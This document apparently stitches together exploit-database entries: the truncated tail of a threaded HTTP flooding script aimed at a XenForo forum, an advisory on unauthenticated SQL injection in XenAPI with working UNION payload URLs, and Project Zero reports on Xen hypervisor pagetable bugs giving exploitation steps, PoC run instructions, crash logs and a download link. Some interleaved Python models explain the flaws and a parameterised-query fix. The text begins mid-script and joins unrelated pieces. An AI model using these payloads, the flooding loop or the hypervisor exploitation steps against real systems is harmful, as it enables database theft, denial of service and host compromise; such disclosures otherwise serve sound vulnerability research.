tic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moder
ator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code&style=100&dir=LTR&d=1520450366'
        for i in range(args.t):
            t = SendGETThread()
            t.start()

    if args.p:
        url = args.p
        for i in range(args.t):
            t = SendPOSTThread()
            t.start()

    if len(sys.argv) == 1:
        parser.print_help()
        exit()

if __name__ == "__main__":
    main(sys.argv[1:])
            
[RCESEC-2016-002] XenAPI v1.4.1 for XenForo Multiple Unauthenticated SQL Injections

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        XenAPI for XenForo
Vendor URL:     github.com/Contex/XenAPI
Type:           SQL Injection [CWE-89]
Date found:     2016-05-20
Date published: 2016-05-23
CVSSv3 Score:   7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE:            -


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
XenAPI for XenForo v1.4.1
Older versions may be affected too but were not tested.


4. INTRODUCTION
===============
This Open Source REST API allows usage of several of XenForo's functions, 
such as authentication, user information and many other functions!

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The plugin "XenAPI" for XenForo offers a REST API with different functions
to query and edit information in the XenForo database backend. Among
those are "getGroup" and "getUsers", which can be called without
authentication (the default). Since the application does not properly
validate and sanitize the "value" parameter, it is possible to inject
arbitrary SQL commands into the XenForo backend database.

The following proof-of-concepts exploit each vulnerable REST action
and extract the hostname of the server:

https://127.0.0.1/api.php?action=getUsers&value=' UNION ALL SELECT
CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23

https://127.0.0.1/api.php?action=getGroup&value=' UNION ALL SELECT
NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS
CHAR)%2C0x20))%2CNULL%23
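The same bug class in runnable form, as an added example that is not XenAPI's code: a getUsers-style lookup that pastes the "value" parameter into its SQL, beside the parameterised version that closes the hole, run against a constructed in-memory SQLite table. The table, its columns and the probe (sqlite_version() and a "--" comment standing in for MySQL's @@HOSTNAME and "#") are assumptions of this example.

```python
import sqlite3

# Constructed stand-in for the XenForo user table; the schema is an assumption.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE xf_user (user_id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO xf_user VALUES (1, 'alice', 'hash-of-alice');
        INSERT INTO xf_user VALUES (2, 'bob',   'hash-of-bob');
    """)
    return con

def get_users_vulnerable(con, value):
    """Lookup in the style the advisory describes: 'value' is concatenated into
    the statement, so a quote ends the literal and the rest runs as SQL (CWE-89)."""
    sql = "SELECT user_id, username FROM xf_user WHERE username = '" + value + "'"
    return con.execute(sql).fetchall()

def get_users_fixed(con, value):
    """Same lookup with a bound parameter: the driver sends 'value' as data,
    so no part of it can change the statement's structure."""
    sql = "SELECT user_id, username FROM xf_user WHERE username = ?"
    return con.execute(sql, (value,)).fetchall()

# Constructed probe in the shape of the advisory's getUsers payload: two columns,
# matching the two the original query selects; sqlite_version() plays the role
# of @@HOSTNAME and '--' the role of MySQL's '#' comment.
PROBE = "' UNION ALL SELECT sqlite_version(), NULL --"

def run_probe():
    """Returns what each variant yields for a normal lookup and for the probe."""
    con = make_db()
    return {
        "normal": get_users_fixed(con, "alice"),
        "vulnerable": get_users_vulnerable(con, PROBE),
        "fixed": get_users_fixed(con, PROBE),
        "library_version": sqlite3.sqlite_version,
    }

if __name__ == "__main__":
    result = run_probe()
    print("vulnerable:", result["vulnerable"])  # one row carrying the library version
    print("fixed:     ", result["fixed"])       # no rows: the probe is just an unknown username
```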


6. RISK
=======
The vulnerability allows remote attackers to read sensitive information 
from the XenForo database like usernames and passwords. Since the affected 
REST actions do not require an authentication hash, these vulnerabilities 
can be exploited by an unauthenticated attacker.


7. SOLUTION
===========
Update to the latest version, v1.4.2.


8. REPORT TIMELINE
==================
2016-05-20: Discovery of the vulnerability
2016-05-20: Notified vendor via contact address
2016-05-20: Vendor provides update for both issues
2016-05-21: Provided update fixes the reported issues
2016-05-21: Vendor publishes update
2016-05-23: Advisory released


9. REFERENCES
=============
https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf
https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1231

This is a bug in Xen that permits an attacker with control over the
kernel of a 64bit X86 PV guest to write arbitrary entries into a live
top-level pagetable.

To prevent PV guests from doing things like mapping live pagetables as
writable, Xen assigns types to physical pages and tracks type-specific
references with a reference counter ("type count", stored in the low
bits of page->u.inuse.type_info).

64-bit PV guests have multiple places in which the addresses of
top-level pagetables are stored:

arch.guest_table_user and arch.guest_table in the vcpu struct point to
the pagetables the guest has designated as user-mode top-level
pagetable and kernel-mode top-level pagetable. Both of these fields
take a type-specific reference on the pagetable to prevent the guest
from mapping it as writable.

arch.cr3 in the vcpu struct points to the current top-level pagetable
of the vCPU. While the vCPU is scheduled, arch.cr3 is the same as the
physical CPU's CR3.
arch.cr3 does not take an extra type-specific reference; it borrows
the reference from either arch.guest_table_user or arch.guest_table.
This means that whenever the field from which the reference is
borrowed is updated, arch.cr3 (together with the physical CR3) must be
updated as well.

The guest can update arch.guest_table_user and arch.guest_table using
__HYPERVISOR_mmuext_op with commands
MMUEXT_NEW_USER_BASEPTR (for arch.guest_table_user) and
MMUEXT_NEW_BASEPTR (for arch.guest_table). The handlers for these
commands assume that when the hypercall is executed, arch.cr3 always
equals arch.guest_table: the MMUEXT_NEW_BASEPTR handler updates
arch.cr3 to the new arch.guest_table, while the MMUEXT_NEW_USER_BASEPTR
handler doesn't touch arch.cr3.

Hypercalls can only be executed from kernel context, so on hypercall
entry, arch.cr3==arch.guest_table is indeed true. However, using the
__HYPERVISOR_multicall hypercall, it is possible to execute the
__HYPERVISOR_iret hypercall, which can switch the pagetables to user
context, immediately followed by the __HYPERVISOR_mmuext_op hypercall
before actually entering guest user context.


This can be exploited from guest kernel context roughly as follows:

 - copy all entries from the top-level kernel pagetable over the
   top-level user pagetable (to make it possible for a post-iret
   hypercall to access guest kernel memory)
 - allocate a new page to be used later as top-level user pagetable,
   copy the contents of the current top-level user pagetable into it,
   remap it as readonly and pin it as a top-level pagetable
 - perform the following operations in a single multicall:
  - switch to user context using __HYPERVISOR_iret
  - change arch.guest_table_user to the new top-level user pagetable
    using __HYPERVISOR_mmuext_op with command MMUEXT_NEW_USER_BASEPTR
 - unpin the old top-level user pagetable
 - map the old top-level user pagetable as writable
 - write crafted entries into the old top-level user pagetable
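A reduced model of the reference bookkeeping described above, added here and not Xen's code: it replays steps 2 to 4 (step 1, copying kernel entries into the user table, is left out) and shows that after iret followed by MMUEXT_NEW_USER_BASEPTR in one multicall, arch.cr3 still points at a table whose last typed reference is gone. Field names mirror the report; the "checked" handler is a modelling choice to make the borrowed-reference invariant visible, not Xen's actual patch.

```python
class Page:
    """A physical page. type_count models the type-specific reference counter
    kept in the low bits of page->u.inuse.type_info."""
    def __init__(self, name):
        self.name = name
        self.type_count = 0

def get_page_type(page):
    page.type_count += 1

def put_page_type(page):
    assert page.type_count > 0, "dropping a reference never taken: " + page.name
    page.type_count -= 1

def guest_may_map_writable(page):
    # With no pagetable type reference left, nothing stops the guest from
    # re-typing the page as a writable data page.
    return page.type_count == 0

class VCPU:
    def __init__(self, kernel_pt, user_pt):
        get_page_type(kernel_pt)          # arch.guest_table holds its own reference
        get_page_type(user_pt)            # arch.guest_table_user holds its own reference
        self.guest_table = kernel_pt
        self.guest_table_user = user_pt
        self.cr3 = kernel_pt              # arch.cr3 borrows from guest_table (kernel context)

    def hypercall_iret(self):
        """__HYPERVISOR_iret switching to user context: cr3 now borrows from
        guest_table_user."""
        self.cr3 = self.guest_table_user

    def new_user_baseptr(self, new_pt):
        """MMUEXT_NEW_USER_BASEPTR as described: guest_table_user is swapped and
        the old reference dropped; cr3 is left alone because the handler assumes
        it borrows from guest_table."""
        get_page_type(new_pt)
        old = self.guest_table_user
        self.guest_table_user = new_pt
        put_page_type(old)

    def new_user_baseptr_checked(self, new_pt):
        """Modelling choice (not Xen's fix): move cr3 along when it borrows from
        the field being replaced, so the borrowed reference never goes stale."""
        borrowed = self.cr3 is self.guest_table_user
        get_page_type(new_pt)
        old = self.guest_table_user
        self.guest_table_user = new_pt
        if borrowed:
            self.cr3 = new_pt
        put_page_type(old)

def run_scenario(checked):
    """Replays the report's steps 2 to 4 with the chosen handler and reports the
    state of the old user pagetable afterwards."""
    kernel_pt, old_user, new_user = Page("kernel L4"), Page("old user L4"), Page("new user L4")
    get_page_type(old_user)               # the guest's user L4 is pinned (step 4 unpins it)
    vcpu = VCPU(kernel_pt, old_user)
    get_page_type(new_user)               # step 2: new table pinned as a top-level pagetable
    vcpu.hypercall_iret()                 # step 3: one multicall, iret ...
    if checked:                           #         ... followed by NEW_USER_BASEPTR
        vcpu.new_user_baseptr_checked(new_user)
    else:
        vcpu.new_user_baseptr(new_user)
    put_page_type(old_user)               # step 4: unpin the old user L4
    return {
        "cr3": vcpu.cr3.name,
        "old_user_type_count": old_user.type_count,
        # the dangerous state: the CPU still walks a table the guest may now rewrite
        "live_table_writable": vcpu.cr3 is old_user and guest_may_map_writable(old_user),
    }

if __name__ == "__main__":
    print("as described:", run_scenario(checked=False))
    print("with check:  ", run_scenario(checked=True))
```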


I have attached a proof of concept that corrupts the top-level
pagetable entry that maps the hypervisor text, causing a host
triplefault. I have tested the proof of concept in the following
configurations:

configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu

configuration 2:
running on a physical machine with Qubes OS 3.2 installed
Xen version 4.6.4

Compile the PoC with ./compile.sh, then run ./attack as root.

PoC Filename: xen_ptuaf.tar 

################################################################################

Here's an exploit that causes the hypervisor to execute shellcode that then deliberately causes a hypervisor GPF by calling a noncanonical address. Usage:

root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
  LD      /root/xen_ptuaf_hv_shellcode_exec/built-in.o
  CC [M]  /root/xen_ptuaf_hv_shellcode_exec/module.o
nasm -f elf64 -o /root/xen_ptuaf_hv_shellcode_exec/native.o /root/xen_ptuaf_hv_shellcode_exec/native.asm
  LD [M]  /root/xen_ptuaf_hv_shellcode_exec/test.o
  Building modules, stage 2.
  MODPOST 1 modules
WARNING: could not find /root/xen_ptuaf_hv_shellcode_exec/.native.o.cmd for /root/xen_ptuaf_hv_shellcode_exec/native.o
  CC      /root/xen_ptuaf_hv_shellcode_exec/test.mod.o
  LD [M]  /root/xen_ptuaf_hv_shellcode_exec/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./attack
kernel CR3: 0xaa2dd000
L1 self-mapping is up, should have reliable pagetable control now
virt_to_pte(0x7f5bd439a000)
[ rest of output missing because of VM crash ]


Serial output:

(XEN) ----[ Xen-4.6.0  x86_64  debug=n  Tainted:    C ]----
(XEN) CPU:    2
(XEN) RIP:    e008:[<00007f5bd439a03f>] 00007f5bd439a03f
(XEN) RFLAGS: 0000000000010246   CONTEXT: hypervisor (d1v2)
(XEN) rax: 1337133713371337   rbx: 1337133713371337   rcx: 1337133713371337
(XEN) rdx: 1337133713371337   rsi: 00007ffe98b5e248   rdi: 0000600000003850
(XEN) rbp: 1337133713371337   rsp: ffff8301abb37f30   r8:  0000000000000000
(XEN) r9:  000000000000001b   r10: 0000000000000000   r11: 0000000000000202
(XEN) r12: 0000000080000000   r13: ffff8800026dd000   r14: ffff880003453c88
(XEN) r15: 0000000000000007   cr0: 0000000080050033   cr4: 00000000001506a0
(XEN) cr3: 00000000aa2dc000   cr2: ffff88007cfb2e98
(XEN) ds: 0000   es: 0000   fs: 0000   gs: 0000   ss: 0000   cs: e008
(XEN) Xen stack trace from rsp=ffff8301abb37f30:
(XEN)    1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN)    1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN)    1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN)    1337133713371337 0000000000401556 000000000000e033 0000000000000246
(XEN)    00007ffe98b5e208 000000000000e02b 0000000000000000 0000000000000000
(XEN)    0000000000000000 0000000000000000 0000000000000002 ffff830088c9c000
(XEN)    000000312b835580 0000000000000000
(XEN) Xen call trace:
(XEN)    [<00007f5bd439a03f>] 00007f5bd439a03f
(XEN) 
(XEN) 
(XEN) ****************************************
(XEN) Panic on CPU 2:
(XEN) GENERAL PROTECTION FAULT
(XEN) [error_code=0000]
(XEN) ****************************************
(XEN) 
(XEN) Reboot in five seconds...

PoC Filename: xen_ptuaf_hv_shellcode_exec.tar 


Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41973.zip
            
Xen allows pagetables of the same level to map each other as readonly
in PV domains. This is useful if a guest wants to use the
self-referential pagetable trick for easy access to pagetables
by mapped virtual address.

When cleaning up a pagetable after the last typed reference to it has been
dropped (via __put_page_type() -> __put_final_page_type() -> free_page_type()),
Xen will recursively drop the typed refcounts of pages referenced by the pagetable,
potentially recursively cleaning them up as well.
For normal pagetables, the recursion depth is bounded by the number of paging levels
the architecture supports. However, no such depth limit exists for pagetables of the
same depth that map each other.

The attached PoC will set up a chain of 1000 L4 pagetables such that
the first pagetable is type-pinned and each following pagetable is referenced by the
previous one. Then, the type-pin of the first pagetable is removed, and the following
999 pagetables are recursively cleaned up, causing a stack overflow.

To run the PoC in a PV domain, install kernel headers, then run ./compile, then load the built module via insmod.
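A reduced model of that cleanup path, added here and not Xen's code: dropping the pin on an ordinary hierarchy recurses once per paging level, while dropping it on a chain of same-level tables recurses once per table, and a chain of 1000 exceeds the modelled stack. The stack budget constant and the class names are constructed for this model.

```python
STACK_BUDGET = 256   # constructed: frames the modelled hypervisor stack can hold

class StackOverflow(Exception):
    pass

class PageTable:
    def __init__(self, level):
        self.level = level
        self.type_count = 0
        self.entries = []   # pagetables this one maps; each mapping holds one typed ref

def map_table(parent, child):
    """Let 'parent' map 'child' read-only; the mapping takes a typed reference on
    the child. Same-level (linear) mappings are permitted, as in PV domains."""
    assert child.level <= parent.level
    child.type_count += 1
    parent.entries.append(child)

def pin(table):
    table.type_count += 1

def put_page_type(table, depth, stats):
    """Drop one typed reference. On the last one, free_page_type() drops the
    references this table holds, recursing into tables it maps."""
    stats["max_depth"] = max(stats["max_depth"], depth)
    if depth > STACK_BUDGET:
        raise StackOverflow(depth)
    table.type_count -= 1
    if table.type_count == 0:
        for child in table.entries:
            put_page_type(child, depth + 1, stats)
        table.entries.clear()

def cleanup_depth(root):
    """Unpin 'root' and return the recursion depth the cleanup reached, or
    "overflow" if it ran past the modelled stack."""
    stats = {"max_depth": 0}
    try:
        put_page_type(root, 1, stats)
    except StackOverflow:
        return "overflow"
    return stats["max_depth"]

def build_hierarchy():
    """Ordinary four-level hierarchy L4 -> L3 -> L2 -> L1, pinned at the L4."""
    l4, l3, l2, l1 = (PageTable(n) for n in (4, 3, 2, 1))
    map_table(l4, l3)
    map_table(l3, l2)
    map_table(l2, l1)
    pin(l4)
    return l4

def build_chain(n):
    """n L4 tables, each mapping the next read-only, pinned at the first."""
    tables = [PageTable(4) for _ in range(n)]
    for prev, nxt in zip(tables, tables[1:]):
        map_table(prev, nxt)
    pin(tables[0])
    return tables[0]

if __name__ == "__main__":
    print("hierarchy:", cleanup_depth(build_hierarchy()))
    print("chain of 100:", cleanup_depth(build_chain(100)))
    print("chain of 1000:", cleanup_depth(build_chain(1000)))
```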

Xen console output caused by running the PoC inside a normal PV domain:

==============================
(XEN) Xen version 4.8.1 (Debian 4.8.1-1+deb9u3) (ian.jackson@eu.citrix.com) (gcc (Debian 6.3.0-18) 6.3.0 20170516) debug=n  Thu Sep  7 18:24:26 UTC 2017
(XEN) Bootloader: GRUB 2.02~beta3-5
(XEN) Command line: loglvl=all com1=115200,8n1,pci console=com1 placeholder
(XEN) Video information:
(XEN)  VGA is text mode 80x25, font 8x16
(XEN) Disc information:
(XEN)  Found 1 MBR signatures
(XEN)  Found 1 EDD information structures
(XEN) Xen-e820 RAM map:
(XEN)  0000000000000000 - 000000000009fc00 (usable)
(XEN)  000000000009fc00 - 00000000000a0000 (reserved)
(XEN)  00000000000f0000 - 0000000000100000 (reserved)
(XEN)  0000000000100000 - 00000000dfff0000 (usable)
(XEN)  00000000dfff0000 - 00000000e0000000 (ACPI data)
(XEN)  00000000fec00000 - 00000000fec01000 (reserved)
(XEN)  00000000fee00000 - 00000000fee01000 (reserved)
(XEN)  00000000fffc0000 - 0000000100000000 (reserved)
(XEN)  0000000100000000 - 0000000120000000 (usable)
(XEN) ACPI: RSDP 000E0000, 0024 (r2 VBOX  )
(XEN) ACPI: XSDT DFFF0030, 003C (r1 VBOX   VBOXXSDT        1 ASL        61)
(XEN) ACPI: FACP DFFF00F0, 00F4 (r4 VBOX   VBOXFACP        1 ASL        61)
(XEN) ACPI: DSDT DFFF0470, 210F (r1 VBOX   VBOXBIOS        2 INTL 20140214)
(XEN) ACPI: FACS DFFF0200, 0040
(XEN) ACPI: APIC DFFF0240, 0054 (r2 VBOX   VBOXAPIC        1 ASL        61)
(XEN) ACPI: SSDT DFFF02A0, 01CC (r1 VBOX   VBOXCPUT        2 INTL 20140214)
(XEN) System RAM: 4095MB (4193852kB)
(XEN) No NUMA configuration found
(XEN) Faking a node at 0000000000000000-0000000120000000
(XEN) Domain heap initialised
(XEN) CPU Vendor: Intel, Family 6 (0x6), Model 78 (0x4e), Stepping 3 (raw 000406e3)
(XEN) found SMP MP-table at 0009fff0
(XEN) DMI 2.5 present.
(XEN) Using APIC driver default
(XEN) ACPI: PM-Timer IO Port: 0x4008 (32 bits)
(XEN) ACPI: SLEEP INFO: pm1x_cnt[1:4004,1:0], pm1x_evt[1:4000,1:0]
(XEN) ACPI:             wakeup_vec[dfff020c], vec_size[20]
(XEN) ACPI: Local APIC address 0xfee00000
(XEN) ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
(XEN) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
(XEN) IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23
(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
(XEN) ACPI: IRQ0 used by override.
(XEN) ACPI: IRQ2 used by override.
(XEN) ACPI: IRQ9 used by override.
(XEN) Enabling APIC mode:  Flat.  Using 1 I/O APICs
(XEN) ERST table was not found
(XEN) Using ACPI (MADT) for SMP configuration information
(XEN) SMP: Allowing 1 CPUs (0 hotplug CPUs)
(XEN) IRQ limits: 24 GSI, 184 MSI/MSI-X
(XEN) Not enabling x2APIC: depends on iommu_supports_eim.
(XEN) xstate: size: 0x440 and states: 0x7
(XEN) CPU0: No MCE banks present. Machine check support disabled
(XEN) Using scheduler: SMP Credit Scheduler (credit)
(XEN) Platform timer is 3.579MHz ACPI PM Timer
(XEN) Detected 2807.850 MHz processor.
(XEN) Initing memory sharing.
(XEN) alt table ffff82d0802bcf38 -> ffff82d0802be594
(XEN) I/O virtualisation disabled
(XEN) nr_sockets: 1
(XEN) ENABLING IO-APIC IRQs
(XEN)  -> Using new ACK method
(XEN) ..TIMER: vector=0xF0 apic1=0 pin1=2 apic2=-1 pin2=-1
(XEN) Allocated console ring of 16 KiB.
(XEN) Brought up 1 CPUs
(XEN) build-id: cd504b2b380e2fe1265376aa845a404b9eb86982
(XEN) CPUIDLE: disabled due to no HPET. Force enable with 'cpuidle'.
(XEN) ACPI sleep modes: S3
(XEN) VPMU: disabled
(XEN) xenoprof: Initialization failed. Intel processor family 6 model 78is not supported
(XEN) Dom0 has maximum 208 PIRQs
(XEN) NX (Execute Disable) protection active
(XEN) *** LOADING DOMAIN 0 ***
(XEN)  Xen  kernel: 64-bit, lsb, compat32
(XEN)  Dom0 kernel: 64-bit, PAE, lsb, paddr 0x1000000 -> 0x1f5a000
(XEN) PHYSICAL MEMORY ARRANGEMENT:
(XEN)  Dom0 alloc.:   0000000118000000->000000011a000000 (989666 pages to be allocated)
(XEN)  Init. ramdisk: 000000011ed74000->000000011ffff3b5
(XEN) VIRTUAL MEMORY ARRANGEMENT:
(XEN)  Loaded kernel: ffffffff81000000->ffffffff81f5a000
(XEN)  Init. ramdisk: 0000000000000000->0000000000000000
(XEN)  Phys-Mach map: 0000008000000000->00000080007a6370
(XEN)  Start info:    ffffffff81f5a000->ffffffff81f5a4b4
(XEN)  Page tables:   ffffffff81f5b000->ffffffff81f6e000
(XEN)  Boot stack:    ffffffff81f6e000->ffffffff81f6f000
(XEN)  TOTAL:         ffffffff80000000->ffffffff82000000
(XEN)  ENTRY ADDRESS: ffffffff81d38180
(XEN) Dom0 has maximum 1 VCPUs
(XEN) Scrubbing Free RAM on 1 nodes using 1 CPUs
(XEN) ....................................done.
(XEN) Initial low memory virq threshold set at 0x4000 pages.
(XEN) Std. Loglevel: All
(XEN) Guest Loglevel: Nothing (Rate-limited: Errors and warnings)
(XEN) *** Serial input -> DOM0 (type 'CTRL-a' three times to switch input to Xen)
(XEN) Freed 312kB init memory
mapping kernel into physical memory
about to get started...
(XEN) d0 attempted to change d0v0's CR4 flags 00000620 -> 00040660
(XEN) PCI add device 0000:00:00.0
(XEN) PCI add device 0000:00:01.0
(XEN) PCI add device 0000:00:01.1
(XEN) PCI add device 0000:00:02.0
(XEN) PCI add device 0000:00:03.0
(XEN) PCI add device 0000:00:04.0
(XEN) PCI add device 0000:00:05.0
(XEN) PCI add device 0000:00:06.0
(XEN) PCI add device 0000:00:07.0
(XEN) PCI add device 0000:00:08.0
(XEN) PCI add device 0000:00:0d.0

Debian GNU/Linux 9 xenhost hvc0

xenhost login: (XEN) d1 attempted to change d1v0's CR4 flags 00000620 -> 00040660
(XEN) d1 attempted to change d1v1's CR4 flags 00000620 -> 00040660
(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.8.1  x86_64  debug=n   Not tainted ]----
(XEN) CPU:    0
(XEN) RIP:    e008:[<ffff82d08017962a>] free_page_type+0xea/0x630
(XEN) RFLAGS: 0000000000010206   CONTEXT: hypervisor
(XEN) rax: 000000000000a3db   rbx: ffff82e000147b60   rcx: 0000000000000000
(XEN) rdx: ffff830000000000   rsi: 4000000000000000   rdi: 000000000000a3db
(XEN) rbp: 4400000000000001   rsp: ffff8300dfce5ff8   r8:  ffff8300dfce7fff
(XEN) r9:  ffff82d0802f2980   r10: 0000000000000000   r11: 0000000000000202
(XEN) r12: 000000000000a3db   r13: ffff83011fd74000   r14: ffff83011fd74000
(XEN) r15: 0000000000000000   cr0: 000000008005003b   cr4: 00000000000406a0
(XEN) cr3: 000000000702d000   cr2: ffff8300dfce5fe8
(XEN) ds: 0000   es: 0000   fs: 0000   gs: 0000   ss: e010   cs: e008
(XEN) Valid stack range: ffff8300dfce6000-ffff8300dfce8000, sp=ffff8300dfce5ff8, tss.esp0=ffff8300dfce7fc0
(XEN) Xen stack overflow (dumping trace ffff8300dfce6000-ffff8300dfce8000):
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
